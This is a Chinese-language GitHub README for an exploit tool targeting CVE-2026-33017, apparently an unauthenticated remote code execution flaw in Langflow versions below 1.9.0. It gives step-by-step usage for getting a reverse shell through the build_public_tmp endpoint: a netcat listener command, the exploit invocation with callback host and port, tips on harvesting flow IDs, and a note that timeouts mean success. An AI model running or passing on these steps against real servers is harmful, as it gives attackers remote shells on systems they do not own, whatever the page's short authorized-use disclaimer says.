diamorphine666/CVE-2026-33017-Exploit

GitHub: diamorphine666/CVE-2026-33017-Exploit

针对 Langflow <1.9.0 未授权 RCE 漏洞(CVE-2026-33017)的自动化利用工具,通过 build_public_tmp 端点实现反弹 shell。

Stars: 0 | Forks: 0

# Fireflow RCE Exploit 通过 `build_public_tmp` endpoint 实现的 Langflow 远程代码执行。 通过 Public Flow Build endpoint 利用,在目标上执行反弹 shell。 ## 环境要求 - Python 3.8+ - `httpx` 库 安装: ``` pip install httpx ``` ## 用法 ``` python exploit.py -u -l -p --flow-id --client-id ``` ### 参数 - `-u, --url` :Langflow 实例的 Base URL(例如:https://flow.example.com/) - `-l, --lhost` :用于接收反弹 shell 的 IP 地址 - `-p, --lport` :反弹 shell 的监听端口 - `-f --flow-id` :目标 flow ID(必填 – 从 /api/v1/flows/ 或 UI 中获取) - `-c --client-id` :用于 session 识别的 `client_id` cookie 值 ## 示例 1. 启动一个监听器: nc -nlvp 9001 2. 运行 exploit: python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d 3. 如果成功,你将获得一个交互式的 bash shell。 ## 重要提示 - ReadTimeout 是正常现象 – 由于 shell 阻塞了 HTTP 请求,服务器可能不会做出响应。只要你在监听器上看到连接,就说明 exploit 已成功执行。 - 需要提供有效的 `flow-id`。可通过 GET /api/v1/flows/ 列出所有 flow,或从浏览器 URL 中复制。 - 本工具仅供授权的渗透测试和教育目的使用。未经明确许可,请勿对系统使用。 ## 受影响版本 - 修复自定义组件 RCE 之前的 Langflow 版本 <1.9.0 ## License MIT – 仅供教育和道德安全研究使用。
标签:CISA项目, Python, 威胁模拟, 无后门, 编程工具, 运行时操纵, 远程代码执行, 逆向工具